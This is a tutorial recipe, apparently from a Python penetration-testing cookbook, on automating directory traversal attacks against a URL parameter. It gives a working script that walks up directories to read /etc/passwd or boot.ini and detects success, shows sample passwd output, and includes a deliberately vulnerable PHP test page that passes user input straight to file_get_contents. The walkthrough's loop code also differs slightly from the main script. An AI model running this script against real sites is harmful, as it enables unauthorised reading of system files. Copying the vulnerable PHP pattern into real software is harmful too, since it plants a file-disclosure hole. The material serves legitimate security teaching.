Traversal de diretório baseado em URL automatizado

Occasionally, websites call files using unrestricted functions; this can allow the fabled Directory Traversal or Direct Object Reference (DOR). In this attack, a user can call arbitrary files within the context of the website by using a vulnerable parameter. There are two ways this can be manipulated: firstly, by providing an absolute link such as /etc/passwd, which states from the root directory browse to the etc directory and open the passwd file, and secondly, relative links that travel up directories in order to reach the root directory and travel to the intended file.

A script that attempts to open a file that is always present on a Linux machine, the aforementioned /etc/passwd file by gradually increasing the number of up directories to a parameter in a URL. It will identify when it has succeeded by the detection of the phrase root that indicates that file has been opened.

Getting ready
Identify the URL parameter that you wish to test. This script has been configured to work with most devices: etc/passwd should work with OSX and Linux installations and boot.ini should work with Windows installations. See the end of this example for a PHP web page that can be used against to test the validity of the scripts.

We will be using the requests library that can be installed through pip. In the author's opinion, it's better than urllib in terms of functionality and usability.

How to do it…
Once you've identified your parameter to attack, pass it to the script as a command line argument. Your script should be the same as the following script:

import requests
import sys
url = sys.argv[1]
payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
up = "../"
i = 0
for payload, string in payloads.iteritems():
  for i in xrange(7):
    req = requests.post(url+(i*up)+payload)
    if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
The following is an example of the output produced when using this script:

Parameter vulnerable

Attack string: ../../../../../etc/passwd

Get me /etc/passwd! File Contents:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
How it works…
We import the libraries we require for this script, as with every other script we've done in the module so far:

url = sys.argv[1]
We then take our input in the form of a URL. As we are using the requests library, we should ensure that our URL matches the form requests is expecting, which is http(s)://url. Requests will remind you of this if you get it wrong:

payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
We establish the payloads which we are going to send in each attack in a dictionary. The first value in each pair is the file that we wish to attempt to load and the second is a value that will definitely be within that file. The more specific that second value is, the fewer false positives that will occur; however, this may increase the chances of false negatives. Feel free to include your own files here:

up = "../"
i = 0
We provide the up directory shortcut ../ and assign it to the up variable and we set the counter for our loop to 0:

for payload, string in payloads.iteritems():
  while i < 7:
The Iteritems method allows us to go through the dictionary and take each key and value, and assign them to variables. We assign the first value as payload and the second value as string. We then cap our loop to stop it repeating forever in the event of a failure. I have set this to 7 though this can be set to any value that you please. Bear in mind the likelihood of a directory structure for a web app being any higher than 7:

req = requests.post(url+(i*up)+payload)
We craft our request by taking our root URL and appending the current number of up directories according to the loop and the payload. This is then sent in a post request:

if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
We check to see whether we have achieved our goal by looking for our intended string in the response. If the string is present, we halt the loop and print out the attack string, along with the response to the successful attack. This allows us to manually verify whether the attack was successful or whether the code needs to be refactored, or the web app isn't vulnerable:

    i = i+1
  i = 0
Finally, the counter is added to each loop until it reaches the preset max. Once the max is reached, it is set to zero for the next attack string.

There's more
This recipe can be adapted to work with parameters through the application of the principles shown elsewhere in the module. However, due to the rarity of pages being called through parameters and intentional brevity, this has not been provided.

This can be extended, as earlier mentioned, by adding additional files and their commonly occurring strings. It could also be extended to grabbing all interesting files once the ability to directory traverse and the depth required to reach root has been established.

The following is a PHP web page that will allow you to test this script on your own build. Just put it in your var/www directory or whichever solution you use. Do not leave this active on an unknown network:

<?php
echo "Get me /etc/passwd! File Contents";
if (!isset($_REQUEST['id'])){
header( 'Location: /traversal/first.php?id=1' ) ;
}
if (isset($_REQUEST['id'])){
  if ($_REQUEST['id'] == "1"){
    $file = file_get_contents("data.html", true);
    echo $file;}

else{
  $file = file_get_contents($_REQUEST['id']);
  echo $file;
}
}?>